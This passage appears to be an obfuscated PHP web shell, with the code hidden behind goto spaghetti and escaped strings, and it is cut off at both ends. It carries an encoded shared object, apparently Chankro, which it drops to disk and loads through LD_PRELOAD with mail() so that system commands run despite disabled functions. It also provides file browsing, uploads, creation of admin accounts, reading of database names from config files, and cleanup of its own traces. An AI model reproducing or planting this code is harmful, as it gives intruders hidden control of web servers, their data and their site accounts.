1\101\x41\x41\x41\101\101\101\x51\101\x38\x66\70\101\101\x41\101\x41\x41\x41\x41\101\x41\x41\101\x41\x41\x41\101\101\101\101\x41\x41\170\147\101\101\101\101\105\101\x46\x77\102\x67\x45\103\101\x41\101\101\101\101\101\x41\101\x41\x41\101\x41\101\101\101\101\x41\x30\167\101\x41\x41\101\105\101\x46\x41\101\131\104\x69\x41\101\x41\101\101\101\101\x41\101\101\x41\x41\x41\101\101\x41\101\x41\x33\101\x41\x41\x41\101\101\x41\x44\x77\x42\x34\x43\121\x41\101\x41\x41\101\x41\101\x41\x41\x41\101\x41\x41\101\x41\x41\x41\101\67\x77\101\x41\x41\x41\105\101\106\167\102\x6f\x45\103\x41\101\x41\101\101\x41\101\x41\x41\101\x41\x41\x41\x41\101\x41\x41\101\53\167\101\x41\101\x41\105\x41\106\x67\x41\101\105\103\x41\x41\x41\x41\x41\x41\x41\x41\101\x41\x41\x41\x41\101\101\101\101\101\x45\x51\105\101\101\x42\111\101\x41\x41\101\101\101\x41\x41\101\x41\101\101\101\x41\x41\x41\x41\x41\101\x41\x41\101\101\101\101\112\121\105\x41\101\x43\x41\101\x41\101\x41\101\x41\101\101\x41\101\101\101\101\x41\x41\x41\x41\x41\x41\101\101\x41\x41\x41\x41\x51\121\x45\x41\x41\x42\101\x41\106\167\102\x6f\105\x43\101\x41\101\101\x41\x41\101\x41\101\x41\x41\101\x41\101\101\x41\101\101\x53\x41\x45\101\101\x42\x49\x41\104\101\x41\125\103\x51\101\x41\101\101\x41\x41\x41\103\x6b\101\101\x41\x41\x41\x41\101\101\101\125\147\x45\x41\101\102\111\101\x44\121\x42\x63\103\x51\x41\101\x41\x41\101\101\x41\x41\101\x41\101\x41\x41\x41\101\x41\x41\101\x57\101\105\101\101\x42\x49\101\101\x41\x41\x41\x41\x41\x41\x41\101\101\101\x41\101\x41\101\x41\x41\101\101\x41\x41\x41\101\101\142\101\105\101\x41\102\x49\x41\104\x41\x44\x67\103\x41\101\101\101\x41\101\101\x41\104\x51\101\101\101\x41\101\101\101\101\101\143\x41\x45\101\x41\x42\111\101\101\101\x41\101\x41\101\101\x41\101\x41\x41\101\x41\x41\101\x41\x41\x41\101\101\x41\101\101\x41\x68\101\105\101\101\103\101\101\x41\x41\x41\x41\101\x41\x41\101\101\101\101\x41\x41\101\101\x41\101\101\x41\101\x41\x41\x41\x41\x6b\x77\105\x41\101\x42\x49\101\x44\101\x41\71\x43\x51\x41\101\x41\101\101\101\101\102\x30\x41\x41\x41\x41\101\x41\101\101\101\156\x51\x45\x41\101\102\x41\x41\107\x41\x42\x77\x45\x43\x41\x41\101\101\101\101\101\x41\x41\x41\101\101\101\101\101\101\x41\x41\x6f\x67\105\x41\101\x42\x41\101\x47\101\x42\x6f\x45\x43\x41\x41\101\x41\101\x41\101\101\x41\101\101\101\101\101\x41\101\x41\x41\162\147\105\x41\x41\x42\x49\x41\101\101\101\101\101\x41\x41\x41\x41\x41\x41\101\101\x41\x41\x41\x41\101\101\101\x41\x41\101\101\x77\121\x45\101\x41\103\x41\x41\x41\101\x41\x41\101\x41\101\x41\x41\x41\101\101\x41\101\x41\101\101\101\x41\x41\x41\101\x41\x41\x31\121\x45\101\101\102\111\101\x41\x41\x41\101\101\x41\x41\x41\101\101\101\x41\x41\x41\101\101\101\x41\x41\101\101\101\101\101\66\x77\x45\x41\101\102\x49\x41\101\101\x41\x41\x41\101\101\x41\101\101\x41\101\101\101\101\101\101\101\x41\101\101\101\x41\101\x2f\121\105\x41\101\x43\x41\x41\101\x41\x41\101\x41\x41\101\101\101\101\x41\x41\101\x41\x41\x41\101\x41\101\101\101\101\x41\x41\x46\167\x49\101\101\x43\111\x41\x41\x41\x41\x41\101\101\101\x41\101\101\x41\101\x41\101\101\x41\x41\101\101\101\x41\x41\101\101\x4d\x77\x49\x41\x41\x42\x49\x41\103\x51\101\131\102\167\x41\101\x41\x41\101\x41\101\x41\101\101\x41\101\101\101\101\101\x41\101\x4f\x51\x49\x41\101\x42\111\101\101\x41\101\101\101\x41\101\x41\101\x41\101\x41\x41\x41\x41\101\x41\101\x41\x41\x41\101\101\101\101\x47\x4e\x79\144\x48\x4e\x30\x64\x57\132\155\114\x6d\x4d\x41\130\x31\x39\113\x51\61\112\146\x54\105\x6c\x54\126\x46\x39\x66\x41\x47\x52\x6c\143\155\126\x6e\141\x58\x4e\x30\132\x58\112\x66\144\x47\61\x66\131\x32\170\x76\142\x6d\x56\x7a\x41\x46\71\x66\x5a\x47\x39\146\x5a\x32\170\166\131\155\x46\163\x58\62\122\x30\142\63\112\172\130\x32\106\x31\145\x41\x42\152\x62\62\61\167\142\107\126\x30\x5a\127\x51\x75\116\152\153\x33\115\147\x42\x66\130\x32\x52\166\x58\x32\144\163\x62\x32\112\150\x62\106\x39\153\x64\x47\71\171\x63\61\71\x68\144\130\x68\146\x5a\155\154\165\141\126\71\x68\143\x6e\x4a\150\x65\x56\71\x6c\x62\x6e\122\171\x65\x51\102\155\143\x6d\x46\164\132\126\71\153\x64\x57\x31\x64\145\x51\102\x66\x58\x32\132\x79\131\x57\x31\154\x58\x32\x52\61\142\127\x31\x35\x58\62\x6c\x75\141\x58\122\x66\x59\130\x4a\x79\x59\130\x6c\x66\x5a\127\65\60\143\156\153\101\141\x47\71\x76\x61\171\x35\152\x41\106\71\146\x52\154\112\x42\x54\x55\126\146\x52\125\x35\105\x58\61\70\x41\130\x31\x39\113\121\x31\x4a\146\122\x55\x35\x45\x58\61\70\101\x58\x31\x39\x6b\143\62\71\x66\x61\x47\x46\165\132\107\x78\154\101\106\x39\x45\x57\x55\65\x42\x54\125\x6c\104\x41\x46\x39\146\122\x30\65\x56\x58\60\x56\x49\130\x30\132\x53\121\x55\61\106\x58\x30\x68\x45\125\147\102\146\130\61\124\x4d\x5f\154\x46\124\x6b\122\x66\x58\167\x42\146\122\60\170\x50\121\153\x46\x4d\130\x30\71\107\x52\x6c\x4e\x46\126\x46\x39\125\121\x55\x4a\115\x52\x56\70\101\132\x32\126\x30\x5a\x57\x35\x32\121\x45\x42\110\124\105\x6c\x43\121\x31\x38\x79\114\152\111\165\x4e\x51\102\146\123\126\122\116\x58\62\122\154\x63\x6d\126\156\141\x58\116\60\132\x58\112\125\124\x55\x4e\x73\142\x32\x35\154\x56\x47\x46\x69\142\x47\x55\101\x58\x32\126\153\131\130\x52\x68\101\x47\122\x68\x5a\127\61\166\142\155\x6c\x36\x5a\x51\x42\146\132\x6d\x6c\165\141\x51\102\172\145\130\x4e\60\x5a\x57\61\101\121\105\x64\115\x53\x55\x4a\104\130\x7a\111\165\x4d\151\64\x31\x41\110\x42\63\x62\x67\102\x7a\x61\127\144\165\131\x57\x78\x41\x51\x45\x64\x4d\x53\x55\x4a\104\130\172\x49\x75\x4d\x69\64\x31\x41\x46\x39\146\132\x32\61\x76\142\154\x39\172\x64\107\106\x79\x64\x46\71\146\101\110\102\171\x5a\127\x78\x76\x59\127\x52\164\132\x51\102\x66\132\x57\65\153\x41\106\x39\x66\131\x6e\116\x7a\130\63\x4e\x30\131\130\112\x30\x41\107\x4e\x6f\142\x57\71\153\121\x45\x42\110\x54\105\154\103\121\61\70\171\114\152\111\x75\116\121\102\146\x53\156\x5a\146\125\155\126\x6e\x61\x58\116\60\132\x58\x4a\x44\142\x47\x46\x7a\x63\x32\x56\172\x41\110\x56\165\143\62\x56\60\x5a\x57\65\x32\x51\105\x42\x48\124\105\x6c\102\x51\153\116\x66\x4d\151\64\x79\x4c\x6a\125\x41\x58\62\x56\64\x61\x58\122\x41\x51\x45\x64\x4d\123\x55\x4a\104\130\x7a\111\165\x4d\151\x34\61\x41\x46\71\112\x56\105\61\x66\x63\x6d\126\x6e\x61\x58\x4e\60\132\130\x4a\x55\124\x55\116\163\142\x32\65\x6c\126\107\106\151\x62\x47\x55\101\x58\x31\x39\152\145\107\x46\146\132\155\154\x75\x59\127\x78\x70\x65\155\126\101\121\105\x64\x4d\123\x55\x4a\104\130\172\x49\x75\115\x69\64\61\101\x46\x39\160\x62\x6d\154\x30\x41\107\132\x76\143\x6d\x74\101\x51\105\x64\x4d\x53\x55\112\x44\x58\172\111\165\115\151\64\x31\x41\x41\75\x3d"; goto a03be307e198bd81; F83a19b55dd80fa6: foreach ($e1230b5d068257ca as $dc080553f2dd0c31) { @unlink($dc080553f2dd0c31); f23176f36b1b7a32: } goto C1e27919a06c5dc7; E530db8c401a36b3: goto c41c3c26e3497796; goto c670abf6570619dc; c63239ad3c7e522b: echo implode("\xa", $c87a5550d81a3565); goto a7152c8f0b154497; Ea87d167e9afad93: echo "\74\150\x33\76\105\162\162\157\x72\x3c\57\150\x33\76\x3c\160\162\145\x3e\x54\x69\x64\x61\153\40\x61\x64\x61\40\x66\x75\156\x67\x73\151\x20\160\x65\155\151\143\x75\40\x43\x68\141\156\153\162\157\x20\171\141\156\147\x20\164\145\x72\x73\145\x64\151\x61\56\x3c\x2f\x70\162\x65\x3e"; goto f4319d9af3213e50; ef4f00d3ce0e9bb0: @unlink($Ed8dca3319901ea0); goto C517ed207bb75842; e202112b49a8fe65: if (file_exists($B9c0b541206410ac)) { goto F4745726b42e81f2; } goto A41094b8ad932b9f; e524b3c97141c60e: E2ec2cb5655c5fd1: goto Bd04a9e2c71b89b0; e1af0f2d407e844a: D6bbbb90a27a99f9: goto A1352d5927513ca2; bf67b78910a836e9: goto Ae348b8e3582acf3; goto dea7208731006181; E95fd2f01550463e: @unlink($ad29fc13e38ce413 . "\x2f\x6f\x75\x74\160\165\164\x2e\164\x78\164"); goto Daa856491e047f8a; B283777475210ffd: a15e8459523c18a8: goto eb12838dff28a7a1; f761c4ba96f693f3: sleep(10); goto e03d7e4dd126e605; F3bbb48ef10585ce: c92f084c5ed8f276: goto eea410920eb8e55c; fcfa3d898ebd96e5: $dbda6e4d0c773773 = $ad29fc13e38ce413 . "\x2f\141\x63\160\151\x64\x2e\x73\157\143\153\145\x74"; goto Fc9e31c208534c55; e03d7e4dd126e605: echo "\74\150\x33\76\110\141\x73\151\154\40\x45\153\163\145\x6b\x75\163\x69\x3a\x3c\x2f\x68\63\x3e"; goto a91d85b63f97ef16; Daa856491e047f8a: goto e6ae199a712c5896; goto e1af0f2d407e844a; ae5b169b171c5129: $F09b543791deeb4d = file_get_contents($B9c0b541206410ac); goto a6d543c25d6f7202; Eef08a725185f16f: $a3cbfa7ce77c7167 = "\x2f\x74\155\160\57\143\x68\x61\x6e\x6b\x72\x6f\x5f\157\x75\164\x5f\52\x2e\x74\x78\x74"; goto db270511ed22b2f6; F6b34f645a294ecc: echo !empty(trim($F09b543791deeb4d)) ? htmlspecialchars($F09b543791deeb4d) : "\133\x50\x65\162\151\156\x74\x61\x68\40\164\151\144\141\153\x20\x6d\x65\156\x67\x68\141\163\x69\154\153\x61\156\x20\157\x75\164\x70\x75\x74\x20\x74\145\x6b\x73\x5d"; goto bf0c47dce47e2aea; a70bf2d9ffa704f3: echo "\x3c\160\162\x65\40\163\x74\x79\x6c\x65\x3d\47\167\150\151\x74\x65\55\163\160\141\143\x65\x3a\40\160\x72\x65\55\x77\x72\141\160\73\x20\142\141\143\153\147\x72\157\165\x6e\x64\x2d\x63\x6f\154\157\x72\72\x20\x23\61\x36\x31\66\61\66\x3b\40\x63\157\154\157\162\72\x20\43\x30\60\x46\x46\x30\x30\x3b\x20\x70\x61\x64\144\x69\x6e\147\72\40\x31\x72\145\155\x3b\x20\142\x6f\162\x64\x65\162\x2d\162\141\144\x69\x75\163\x3a\40\64\160\x78\x3b\x20\x66\x6f\156\164\55\x66\x61\x6d\x69\154\x79\72\x20\42\x43\x6f\156\x73\x6f\154\x61\163\x22\54\x20\42\115\x65\x6e\154\157\42\54\x20\42\103\x6f\x75\162\x69\145\162\40\x4e\x65\x77\x22\54\40\x6d\157\156\x6f\163\160\x61\x63\x65\73\40\x66\157\x6e\x74\x2d\163\x69\172\x65\x3a\x20\x31\162\145\155\x3b\x20\x6c\x69\x6e\x65\55\150\x65\151\147\150\x74\72\x20\61\x2e\x38\73\x27\76"; goto c63239ad3c7e522b; eb12838dff28a7a1: @unlink($Ed8dca3319901ea0); goto Dfefb01a526f0949; Ee5a3b51e3ca850b: $A8dfbf942e896b78 = glob($ad29fc13e38ce413 . "\57\x63\x68\x61\x6e\153\x72\x6f\137\x6f\x75\164\x5f\52\56\164\170\x74"); goto C5380c96034b73d6; Dfefb01a526f0949: @unlink($dbda6e4d0c773773); goto F305d57fefc8f030; b044a699966291b6: Aa6e687d0b65e602: goto aa21b224f62524f0; a4b9bb601c054fb9: goto aaad775ffc6af53b; goto Fff0afae46d359e9; a03be307e198bd81: $Ed8dca3319901ea0 = $ad29fc13e38ce413 . "\x2f\143\x68\x61\156\x6b\162\x6f\56\x73\x6f"; goto fcfa3d898ebd96e5; C517ed207bb75842: @unlink($dbda6e4d0c773773); goto a36efbca880db232; A41094b8ad932b9f: echo "\x3c\x70\76\120\145\162\x69\x6e\164\x61\x68\40\144\151\x65\x6b\x73\x65\x6b\165\163\x69\x2c\40\x6e\141\x6d\x75\x6e\40\x74\151\x64\x61\153\40\141\144\141\x20\x66\151\x6c\x65\40\x6f\165\164\160\165\164\x20\x79\141\156\147\x20\x64\151\x62\165\141\164\x2e\74\x2f\160\x3e"; goto E530db8c401a36b3; c0707675e012a6da: echo "\74\x70\76\x54\151\144\x61\x6b\40\141\144\141\x20\x74\x6f\153\x65\156\40\x79\x61\156\147\x20\142\x65\162\x68\141\x73\x69\x6c\40\144\x69\x62\x75\141\164\x20\141\x74\x61\165\40\144\151\x74\145\155\x75\153\141\x6e\56\x3c\57\160\76"; goto b6a0b7463e752b11; fad91cefc856f975: goto a15e8459523c18a8; goto Fa55d3d40e912861; acf63ab820ba7e1b: $b4f8114fff5af764 = "\x28" . $d8ed25ed8034da9f . "\51\40\x3e\x20" . $B9c0b541206410ac . "\x20\62\x3e\x26\61"; goto bf67b78910a836e9; cb33ca8234177309: e6ae199a712c5896: goto d1057eabb4edd327; Fb8f2629fb5842e3: putenv("\114\x44\137\120\122\x45\114\x4f\101\x44\x3d" . $Ed8dca3319901ea0); goto B077ca46c017a504; bd618d16baf8e8f0: goto aaad775ffc6af53b; goto Cd7d88feff642123; Cc06dd79398a3ec5: file_put_contents($dbda6e4d0c773773, base64_decode($e142cded73ae38e9)); goto B051e3160950ad86; db270511ed22b2f6: $e8b2b7f6d0c08e31 = glob($a3cbfa7ce77c7167); goto bcaa34f4d89f0d85; a664618a2ec8ae36: $B9c0b541206410ac = $ad29fc13e38ce413 . "\57\x6f\165\x74\160\165\x74\56\x74\x78\164"; goto e202112b49a8fe65; B411eecae8b16fd1: $b4f8114fff5af764 = "\50" . $d8ed25ed8034da9f . "\51\x20\x3e\40" . $D141fd1817ca6ed7 . "\40\x32\x3e\x26\61"; goto F68ecb31f3657237; Fff0afae46d359e9: E9372366a59360af: goto D57f13632c561182; C1e27919a06c5dc7: Ba933da2528fbb68: goto Dcbce582af925dfc; B1c3d343575239be: c41c3c26e3497796: goto fad91cefc856f975; ebfa599e4a0341f6: C7C565B38F4C3dbF("\141", "\141", "\x61"); goto e5d0ced24542a7d7; F305d57fefc8f030: if ($Ef746fc8ffd9dd9d) { goto D6bbbb90a27a99f9; } goto E95fd2f01550463e; c670abf6570619dc: F4745726b42e81f2: goto ae5b169b171c5129; Dcbce582af925dfc: dc6388c1f4ef58cf: goto ef4f00d3ce0e9bb0; a6d543c25d6f7202: echo "\x3c\160\x72\145\x20\x73\164\x79\154\x65\x3d\x27\167\150\x69\164\145\55\x73\x70\x61\143\145\x3a\x20\x70\x72\145\55\167\x72\x61\160\x3b\40\142\x61\x63\x6b\x67\x72\x6f\165\156\x64\55\143\x6f\154\157\x72\72\x20\43\x31\x36\x31\x36\61\x36\73\x20\143\157\154\157\x72\72\x20\43\x65\60\x65\x30\145\x30\73\x20\160\141\144\144\x69\x6e\147\x3a\x20\x31\x72\145\155\73\x20\x62\157\x72\x64\x65\162\55\x72\x61\x64\x69\x75\163\x3a\x20\x34\x70\x78\x3b\40\146\157\156\x74\x2d\x66\x61\x6d\x69\x6c\x79\72\40\42\103\x6f\156\163\x6f\x6c\x61\163\x22\54\x20\42\115\145\x6e\x6c\x6f\x22\54\40\x22\103\x6f\165\x72\x69\x65\x72\40\x4e\145\167\42\54\40\x6d\157\x6e\x6f\x73\160\141\x63\x65\73\40\x66\x6f\156\164\55\x73\x69\172\x65\x3a\x20\x30\x2e\71\x72\145\x6d\x3b\47\76"; goto F6b34f645a294ecc; Bd04a9e2c71b89b0: echo "\74\x68\64\76\124\157\x6b\145\156\x20\x79\141\x6e\147\40\142\145\162\x68\x61\163\151\154\40\144\x69\142\165\x61\164\x3a\74\x2f\x68\64\76"; goto a70bf2d9ffa704f3; D57f13632c561182: error_log("\141", 1, "\141"); goto B1ec40eca6be57ee; d5eb70d0414cb65f: Bc269d8fd7907098: goto D7ca9cbd875db619; a78c4f2148abb085: if (function_exists("\155\142\x5f\x73\145\156\144\137\155\141\151\x6c")) { goto b13b82484089d7eb; } goto dd35793b59b3bfb1; bcaa34f4d89f0d85: $c87a5550d81a3565 = []; goto C91cbe15544725fc; c632636ec13adba2: if (!$e1230b5d068257ca) { goto dc6388c1f4ef58cf; } goto F83a19b55dd80fa6; C5380c96034b73d6: if (!$A8dfbf942e896b78) { goto c87b25422d4a64b8; } goto C2e4a219ec521290; B077ca46c017a504: if (function_exists("\x6d\x61\x69\154")) { goto eefbcccdade3c789; } goto a78c4f2148abb085; d1057eabb4edd327: } goto a0bf425d84ba9a70; f740dc24c787b171: echo $bac6a93e3c6b58ea; goto f3d2fa9ea5903123; De01fc6cb41f9290: f37e884184d7859c: goto d32904d5b742b894; d5635573bd42df43: a4a9c738c2235807: goto a8c0d8cec0545f0e; aff173a165393552: goto C18e553155011f1d; goto ee9326c4103f8059; F345a6baa7a7ce65: e1e0064ef17f1719: goto Cd8777c517056765; ef8da76f696d16ae: $Cd1e6c38bf6c5fac = dirname($Cd1e6c38bf6c5fac); goto B59d9335c1f27aae; e37296ebe02b53e5: echo "\x3c\x2f\163\x70\x61\156\x3e\xd\xa\11\x9\11\11\x9"; goto ed2460a9a49b0bac; Ff088d0c87dad9e0: $ffc943dc0b3a48b0 = isset($_POST["\141\167\x61\x6c"]) && in_array($_POST["\141\167\x61\x6c"], $C1c94278ef7ad2e1) ? $_POST["\x61\167\x61\154"] : "\144\141\x73\x61\162"; goto ba4b6e0f93a2102e; d32904d5b742b894: Fd82c8d7feb8b771: goto e4a51239f2d500ac; fe635237c00c0f01: $ffc943dc0b3a48b0 = "\x64\x61\163\141\x72"; goto f4f208196e7b4b54; d7d0c7387e8d7715: e07892c55c745dbb: goto Fa1121547e04e20e; dbb088255fdba80b: if ($_POST["\x61\167\141\154"] == "\x73\153\154") { goto e1e0064ef17f1719; } goto b165eadcd11369cf; C70963d9029d5486: $D1e4ee6a5ff10c98 = "\x78\163\150\151\x6b\141\x74\x61"; goto B3e754258a4919a8; e837663c7d95ce4a: $b50bd9e19d842bf1 = BEcc62336785B14e($c17121c8c5afcfe3, "\104\x42\x5f\x4e\101\115\105"); goto d2106c940d3ba33e; f3d5b2599b73039f: echo "\x3c\57\x74\142\157\x64\x79\x3e\x3c\x2f\164\141\142\x6c\x65\76\x3c\x2f\144\151\x76\x3e"; goto ceefc1288957dc3f; ec0e3e93d136f75a: echo getmyuid() . "\x20\50" . get_current_user() . "\x29"; goto ba7f3e4d3f095795; ba244155e73ac1b7: e20b1cc373c122e5: goto a6a7f365989bc334; c9efd07d0d93c4e1: Aa666920ca7369a6: goto cf4d6a1b88890aa3; Fb05220770cfc145: d73779543a2c3c6e: goto D79dbd0a68845ee8; Fb75c7402c09b842: A5f2ad4ba657f838: goto ca6050e4a5f4cf08; a40d54a12aba99b2: if ($a8a9fc47be90efed) { goto B2b6508c5b672564; } goto Df23dc518aa2b999; Da171e4ffd6c9a2f: function bEcc62336785b14E($F09b543791deeb4d, $d004e3ed12168d51) { goto Cded021645c3aade; Cded021645c3aade: if (!preg_match("\x2f\x64\x65\146\151\156\145\134\x28\x5c\x73\52\x27" . preg_quote($d004e3ed12168d51, "\x2f") . "\x27\54\x5c\x73\52\47\x28\x5b\136\47\135\x2b\x29\x27\57", $F09b543791deeb4d, $A6f056c3d73cfecd)) { goto Fea33b7951b5bafc; } goto D77139a89dc31d05; db11b43436d5cfe6: return null; goto Fbf811be123d9f83; f2bbd30f9f4fd2b8: Fea33b7951b5bafc: goto db11b43436d5cfe6; D77139a89dc31d05: return $A6f056c3d73cfecd[1]; goto f2bbd30f9f4fd2b8; Fbf811be123d9f83: } goto ad785c4b1b096690; Daa45b5282ea4ab8: if (isset($_FILES["\x75\x70\154\x6f\x61\x64\137\x66\151\154\x65"]) && $_FILES["\x75\160\x6c\x6f\141\144\x5f\146\151\x6c\145"]["\145\162\162\157\162"] === UPLOAD_ERR_OK) { goto a6ff6a88a2a6d9dd; } goto d824d5b111b06776; D4b90d78e9b55d52: D4fe4fb25bce231b: goto b236938e78e0c92f; A3459685fd3af1db: $Fd179b57e98335fb = scandir($f6f05644d791da73); goto E3a54784769ca2d8; F49d9fde9045d2e8: set_time_limit(0); goto B64003d92df8aa60; fad5b6cf739d253e: bcb5ce5ebb9c34e8: goto f8b22b7062ee8ff1; A1b2941de97cb50f: if (!(!$a8a9fc47be90efed && ini_get("\x61\154\154\x6f\167\137\165\162\154\x5f\146\x6f\160\145\x6e"))) { goto E1f9634de697b01c; } goto A1849f273586f711; Fa3f52b17b06b820: $c9c3dbf37270f221 = substr($f6f05644d791da73, strlen($f6f05644d791da73) - 1) != "\57" ? "\x2f" : ''; goto cd3a4c978d4b2c8d; D4576e2c25f322ef: if (!empty($D4923a741daf1b7e)) { goto f4a0d384024944bc; } goto c83b3909a7aa1a31; e5d2ce9f445d3b51: goto F82aafb4462037fe; goto bfbe2c3408d46206; f5c8a3044258d670: $Babedf152eb7b8d1 = $f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3; goto cd789f9bc659749c; d283ff3bd9703bfe: echo "\x22\x3e\15\xa\x20\x20\x20\x20\x20\x20\40\40\x3c\142\x75\x74\x74\157\156\x20\164\x79\160\145\x3d\42\x73\x75\142\x6d\x69\x74\x22\x20\143\x6c\141\163\x73\x3d\42\142\x74\x6e\55\x6d\157\144\x65\162\156\x22\x3e\74\x69\40\143\154\x61\x73\x73\75\x22\146\x61\163\40\146\141\55\165\x73\x65\162\55\x73\150\151\145\154\144\42\x3e\74\x2f\151\x3e\x20\x43\162\x65\x61\164\x65\40\101\x64\155\x69\x6e\x3c\57\x62\x75\164\x74\x6f\156\x3e\15\xa\40\40\40\40\40\x20\x3c\57\146\x6f\x72\x6d\x3e\15\12\x20\40\x20\40\74\x2f\x64\x69\166\x3e\15\xa\x3c\x2f\144\151\166\x3e\15\12\15\xa\x3c\144\x69\166\x20\x69\x64\75\x22\156\x65\x77\106\x69\154\145\x43\157\156\x74\141\x69\x6e\x65\x72\x22\40\163\x74\171\154\x65\x3d\x22\x64\151\163\160\154\x61\x79\x3a\x6e\157\156\145\73\40\155\x61\x72\147\x69\156\x2d\164\x6f\160\72\40\61\56\x32\x72\145\155\x3b\42\76\15\12\x20\x20\x20\40\x3c\146\157\162\x6d\40\155\x65\164\150\157\x64\75\42\120\117\x53\124\42\x20\143\154\x61\163\x73\x3d\42\156\145\167\x2d\146\151\154\x65\55\x66\x6f\162\155\x22\x3e\15\12\x20\40\40\40\40\40\x20\x20\74\x69\156\x70\x75\164\40\x74\x79\x70\x65\x3d\x22\x68\x69\144\144\145\156\x22\40\x6e\x61\x6d\145\75\x22\141\167\141\154\x22\x20\x76\141\x6c\165\145\75\42\142\x75\x61\x74\137\x66\151\154\x65\42\x3e\xd\12\x20\40\40\40\40\x20\x20\40\74\x69\156\x70\x75\x74\x20\x74\171\x70\x65\75\42\x68\151\x64\144\x65\156\x22\40\x6e\141\x6d\x65\x3d\42\142\x65\x72\x6b\x61\x73\x22\40\x76\141\154\x75\x65\x3d\42"; goto a544fbb78bdabe99; Df7c294d0e3ba356: function D63dBF31B9b855Eb() { goto Fc5b5abc315faff1; a9847f4c084cf1b6: if (substr($C23ed13d021656fe, 0, 1) === "\x2f") { goto Fd828d4252027c7b; } goto Fdc8525d9d39b896; f05e9da134d00fbb: $Ebaf793a7b20354e = explode("\57", $C23ed13d021656fe); goto A091a6ac4e4f541e; Fc5b5abc315faff1: global $f6f05644d791da73; goto a76507d7611f6503; Ac053e9d2b8e4d80: $f6f05644d791da73 = getcwd(); goto b46bc66581fb8622; dd1a3173a6aad08e: $C23ed13d021656fe = substr($C23ed13d021656fe, 3); goto dc38a5472329eba6; Fdc8525d9d39b896: if (preg_match("\57\x5e\x28\133\x61\55\172\x41\55\x5a\135\x3a\x5c\57\x29\x2f", $C23ed13d021656fe, $A6f056c3d73cfecd)) { goto dbcc5b4d1f3b4411; } goto A98c65a44391e7e6; a76507d7611f6503: if (!(!isset($f6f05644d791da73) || !is_string($f6f05644d791da73) || $f6f05644d791da73 === '')) { goto A2dbc67cbbc3e785; } goto Ac053e9d2b8e4d80; dc38a5472329eba6: f141bc2a468e2494: goto f05e9da134d00fbb; De5699fa06208b21: F0b02e7c6a49fd5c: goto e73cecc0f6defdc6; A091a6ac4e4f541e: foreach ($Ebaf793a7b20354e as $E73ce7112b6cd99c) { goto fdd200f12a271fbe; Da6b129f533b5e93: if (!(substr($df87403cf9262125, -1) !== "\x2f")) { goto C15d5716c6b1aaf3; } goto bd14f535d5d5cae0; bd14f535d5d5cae0: $df87403cf9262125 .= "\57"; goto B4d5eee09fc10167; d87a8bc1615a5956: $df87403cf9262125 .= $E73ce7112b6cd99c; goto c6c7725138da996c; Dc9af5036befd29e: ceefb12df97c7541: goto Da6b129f533b5e93; a9b8524cde627fb0: goto d7655e8f3d37e31b; goto Dc9af5036befd29e; B4d5eee09fc10167: C15d5716c6b1aaf3: goto d87a8bc1615a5956; fdd200f12a271fbe: if (!empty($E73ce7112b6cd99c)) { goto ceefb12df97c7541; } goto a9b8524cde627fb0; c6c7725138da996c: $D54051de91e86068[] = "\x3c\141\40\150\x72\x65\146\x3d\47\152\x61\166\141\x73\143\162\x69\160\x74\x3a\x6e\x61\x76\x69\x67\x61\164\145\50\x22\142\145\162\x6b\141\x73\x22\54\40\42" . B526E9837163414E($df87403cf9262125) . "\42\x29\47\x20\x73\x74\171\x6c\x65\75\x27\143\157\154\x6f\x72\x3a\43\106\x46\106\x46\x46\106\73\47\x3e" . htmlspecialchars($E73ce7112b6cd99c) . "\x3c\x2f\x61\76"; goto dff4b46bf4e98eaf; dff4b46bf4e98eaf: d7655e8f3d37e31b: goto d6519c6a57dd7934; d6519c6a57dd7934: } goto De5699fa06208b21; B094f788ed463627: $D54051de91e86068[] = "\74\141\40\150\x72\x65\146\75\47\x6a\141\x76\x61\163\143\x72\151\x70\164\x3a\x6e\x61\166\151\x67\141\x74\145\x28\x22\x62\x65\x72\x6b\141\163\42\x2c\40\42" . b526e9837163414E($df87403cf9262125) . "\x22\x29\47\40\163\x74\171\154\145\x3d\47\x63\157\154\157\162\x3a\x23\106\x46\106\x46\x46\x46\x3b\47\x3e" . htmlspecialchars($Fc9b8c1b1f2af154) . "\x3c\x2f\x61\x3e"; goto dd1a3173a6aad08e; E0885ed4081c00a0: $C23ed13d021656fe = str_replace("\134", "\57", $f6f05644d791da73); goto a9847f4c084cf1b6; A2533437e153f6e0: goto f141bc2a468e2494; goto E4b03fbe88030739; Ef4a9bd6ab72ed68: $D54051de91e86068 = []; goto d925bbc1bcdeb7b4; E2efafc5400c1859: $D54051de91e86068[] = "\74\141\40\x68\x72\145\x66\75\x27\152\141\166\141\163\143\162\151\x70\164\x3a\156\x61\166\151\147\x61\x74\x65\x28\42\142\145\162\x6b\141\x73\x22\x2c\40\x22" . B526e9837163414E($df87403cf9262125) . "\x22\x29\x27\40\163\164\171\x6c\x65\x3d\47\143\x6f\x6c\157\x72\72\x23\106\x46\106\106\106\x46\73\x27\x3e\57\x3c\x2f\141\76"; goto Edd219357e706737; Edd219357e706737: $C23ed13d021656fe = substr($C23ed13d021656fe, 1); goto A2533437e153f6e0; E4b03fbe88030739: dbcc5b4d1f3b4411: goto a9d9f46d2b7a40c7; e73cecc0f6defdc6: echo implode("\x3c\x73\160\141\x6e\40\163\164\x79\154\145\75\x27\143\157\x6c\x6f\x72\x3a\43\144\144\x64\x3b\47\x3e\57\74\57\163\x70\141\156\76", $D54051de91e86068); goto Ee0f114e3e4ff5da; A98c65a44391e7e6: goto f141bc2a468e2494; goto f189c6841e4aeb5d; fdc25376acc5e480: $df87403cf9262125 = $A6f056c3d73cfecd[1]; goto B094f788ed463627; b46bc66581fb8622: A2dbc67cbbc3e785: goto Ef4a9bd6ab72ed68; d925bbc1bcdeb7b4: $df87403cf9262125 = ''; goto E0885ed4081c00a0; Efd547b1da1dff54: $df87403cf9262125 = "\x2f"; goto E2efafc5400c1859; f189c6841e4aeb5d: Fd828d4252027c7b: goto Efd547b1da1dff54; a9d9f46d2b7a40c7: $Fc9b8c1b1f2af154 = substr($A6f056c3d73cfecd[1], 0, 2); goto fdc25376acc5e480; Ee0f114e3e4ff5da: } goto F60c85a45bd7eb20; F8d61d7ff61dc629: goto f5a7cd0e5c6e3c0c; goto a09f977b9f2eb193; df25789b92d2a9c4: Ebd0566191f1746e: goto Bd3c45c42bd72a23; D5378be6e817aafc: echo 